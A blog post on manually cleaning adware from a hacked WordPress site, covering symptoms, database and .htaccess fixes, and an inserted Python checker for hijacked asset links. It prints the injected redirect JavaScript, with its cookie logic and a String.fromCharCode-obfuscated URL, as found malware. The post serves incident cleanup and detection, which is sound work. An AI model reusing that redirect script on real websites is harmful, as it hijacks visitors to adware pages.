Manually Cleaning Malware from WordPress Website

Recently, my website was hacked and infected with malware/adware. It took me some time to fix the problem.

Symptoms of the Malware/Adware

Here are a few obvious symptoms of the malware/adware:

  • The main page was redirecting to different websites;
  • The WordPress admin page (wp-admin) could not be reached (the browser reported ERR_TOO_MANY_REDIRECTS).

There were more symptoms. I checked the source of the infected page in the browser (http://www.yourwebsite.com stands in for your own site throughout this post):

view-source:http://www.yourwebsite.com

I found that many links in my pages (especially to CSS files) had been replaced by URLs on another website (http://setforspecialdomain.com/fr3w5jhg?type=fr).

The replaced CSS links served malicious code that redirected my pages to other websites:

var x = getCookie('pp0000011');
if (x) {
    var x2 = getCookie('pp0000012');
    if (x2) {
        // Both cookies present: redirect to the hard-coded URL
        var sdfgdfg = "http://nserpage.tk/index/?4831537102803";
        document.location.replace(sdfgdfg);
        window.location.href = sdfgdfg;
        document.location.href = sdfgdfg;
    } else {
        // Second visit: set the second cookie, then redirect to a URL obfuscated with String.fromCharCode
        setCookie('pp0000012','1',1);
        var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);
        document.location.replace(sdfgdfg);
        window.location.href = sdfgdfg;
        document.location.href = sdfgdfg;
    }
} else {
    // First visit: set the first cookie, then redirect to the hard-coded URL
    setCookie('pp0000011','1',1);
    var sdfgdfg = "http://nserpage.tk/index/?4831537102803";
    document.location.replace(sdfgdfg);
    window.location.href = sdfgdfg;
    document.location.href = sdfgdfg;
}
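The two checks above (foreign hosts in stylesheet/script links, and inline redirect code obfuscated with String.fromCharCode) can be automated over a saved copy of the page source. This is an added example, not code from the original post; the class and function names are my own, and the sample page uses placeholder domains (malicious.example, evil.example) rather than the real ones:

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class AssetCollector(HTMLParser):
    """Collect the URLs of every stylesheet <link> and external <script> in a page."""

    def __init__(self):
        super().__init__()
        self.assets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.assets.append(("css", a["href"]))
        elif tag == "script" and a.get("src"):
            self.assets.append(("js", a["src"]))


def foreign_assets(html, site_host):
    """Return (kind, url) for each CSS/JS asset loaded from a host other than site_host."""
    p = AssetCollector()
    p.feed(html)
    return [(kind, url) for kind, url in p.assets
            if urlparse(url).netloc and urlparse(url).netloc.lower() != site_host.lower()]


FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
REDIRECT = re.compile(r"(?:document|window)\.location(?:\.href\s*=|\.replace\()")


def redirect_indicators(text):
    """Decode String.fromCharCode(...) payloads and count location-redirect calls in inline JS."""
    decoded = ["".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
               for m in FROMCHARCODE.finditer(text)]
    return {"redirects": len(REDIRECT.findall(text)), "decoded_strings": decoded}


# Constructed sample page: one legitimate stylesheet, one hijacked stylesheet link
# (placeholder domain), and an inline obfuscated redirect like the one shown above.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://www.yourwebsite.com/wp-content/themes/x/style.css">
<link rel="stylesheet" href="http://malicious.example/fr3w5jhg?type=fr">
<script>var u=String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,46,101,120,97,109,112,108,101,47,120);document.location.replace(u);window.location.href=u;</script>
</head><body></body></html>"""

if __name__ == "__main__":
    print(foreign_assets(SAMPLE_HTML, "www.yourwebsite.com"))
    print(redirect_indicators(SAMPLE_HTML))
```

Run it against the output of view-source saved to a file; a clean site reports an empty asset list and zero redirects.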

I also checked the database of my website. The siteurl option (which should be my website's URL) in the options table had been replaced by the malicious website:

SELECT * FROM `YouDatabase`.`wp_options` WHERE `option_name`='siteurl'

Note that the database name is defined in wp-config.php (in the root directory of the WordPress installation) by the following line:

define('DB_NAME', 'YouDatabase');

The options table is named by prefixing options with $table_prefix, which is defined in wp-config.php as

$table_prefix  = 'wp_';

Steps for Cleaning Malware

Here are the steps I used to clean the malware/adware from my website. You need access to your website's source files and database (e.g., through FTP and phpMyAdmin).

Restore Access to WordPress Admin

Here are the steps I took to restore access to the WordPress admin page (wp-admin), which was failing with ERR_TOO_MANY_REDIRECTS. It is recommended to back up your website before performing them.

Restore the Homepage in Database

The first step is to restore the homepage information in the website's database by updating both siteurl and home:

UPDATE `wp_options` SET `option_value` = 'http://www.yourwebsite.com' WHERE `option_name` = 'siteurl';
UPDATE `wp_options` SET `option_value` = 'http://www.yourwebsite.com' WHERE `option_name` = 'home';

Disable Plugins

Sometimes the login error is caused by a plugin, and sometimes the malicious code is hiding in a plugin.

Before disabling all plugins, it is recommended to keep a record of the currently active plugins. The list is stored in the option_value column of the row with option_name = 'active_plugins' in the options table:

SELECT * FROM `wp_options` WHERE option_name = 'active_plugins';

After that, you can disable all plugins either by updating the active_plugins value in the database to an empty string, or by renaming the /wp-content/plugins directory.

Using Default .htaccess

The .htaccess file in the root directory of the WordPress installation might have been altered by the malware. A simple fix is to replace it with the default WordPress .htaccess:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

After these steps, I regained access to WordPress Admin page.

Further Actions

Upgrade WordPress

The malware/adware may already have modified existing WordPress files. In addition, old WordPress versions can have known security holes that malware/adware exploits. Thus a simple way to remove the malicious code is to upgrade WordPress to the newest version.

Deactivate Unused Plugins

The malware/adware could also be hiding in a plugin. Deactivating any plugins that are not really used is therefore a good way to reduce the chance of being hacked.

Posted on: Mar 10, 2019
